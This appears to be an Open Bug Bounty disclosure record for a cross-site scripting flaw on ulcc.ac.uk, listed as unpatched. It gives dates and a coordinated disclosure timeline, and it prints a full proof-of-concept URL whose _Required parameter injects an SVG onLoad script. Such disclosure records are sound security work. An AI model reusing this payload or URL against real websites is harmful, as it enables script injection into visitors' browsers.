ulcc.ac.uk XSS vulnerability

2017-03-13T19:54:00
ID OBB:218747
Type openbugbounty
Reporter LewisWildgoose
Modified 2017-06-05T20:14:00

Description

Vulnerable URL:
http://www.ulcc.ac.uk/ulcc-bin/generic_form?AfterURL=http%3A%2F%2Fwww.london.ac.uk%2Findex.php%3Fid%3D344&deliverto=osd%40london.ac.uk&_MailSubject=Course+booking+enquiry&_EmailCopy=y&_MailHead=Thank+you+for+your+course+enquiry%2Fbooking.+A+member+of+the+Staff+Development+Unit+will+contact+you+shortly+to+confirm+your+booking.+A+copy+of+your+original+enquiry%2Fbooking+is+provided+below%3A&_Required=%3CsvG%20onLoad=prompt%28%22OPENBUGBOUNTY%22%29%3E&Time_Interested=&Reasons_To_Attend=&How_You_Apply_Skills=&Assisting_In_Your_Role=&Special_Needs=
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 28.07.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 858368
VIP website status:| No
ulcc.ac.uk SSL connection:| Grade: C

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 13 March, 2017 19:54 GMT
Generic security notifications sent to website owner| 13 March, 2017 19:56 GMT
Vulnerability details disclosed by researcher| 5 June, 2017 20:14 GMT